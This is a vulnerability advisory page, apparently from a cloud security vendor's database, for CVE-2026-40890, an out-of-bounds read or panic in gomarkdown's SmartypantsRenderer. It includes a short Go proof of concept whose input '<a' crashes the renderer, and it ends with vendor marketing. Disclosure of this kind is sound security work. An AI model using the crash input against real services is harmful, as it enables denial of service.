Cloud Vulnerability DB
A community-led vulnerabilities database
Vulnerability DatabaseCVE-2026-40890
CVE-2026-40890:
MinimOS vulnerability analysis and mitigation
Summary
Processing a malformed input containing a < character that is not followed by a > character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic.
Details
The smartLeftAngle() function in html/smartypants.go:367-376 performs an out-of-bounds slice operation when processing a < character that is not followed by a > character anywhere in the remaining text.
https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376
If the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic.
PoC
package main
import (
"bytes"
"fmt"
"github.com/gomarkdown/markdown/html"
)
func main() {
src := []byte("<a")
fmt.Printf("Input: %q (len=%d, cap=%d)\n", src, len(src), cap(src))
var buf bytes.Buffer
sp := html.NewSmartypantsRenderer(html.Smartypants)
sp.Process(&buf, src) // panics: slice bounds out of range
fmt.Printf("Output: %q\n", buf.String())
}Impact
This vulnerability will lead to a Denial of Service / panic on the processing service. -- The Datadog Security Team
Source: NVD
Related MinimOS vulnerabilities:
Free Vulnerability Assessment
Benchmark your Cloud Security Posture
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Additional Wiz resources
Get a personalized demo
Ready to see Wiz in action?
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management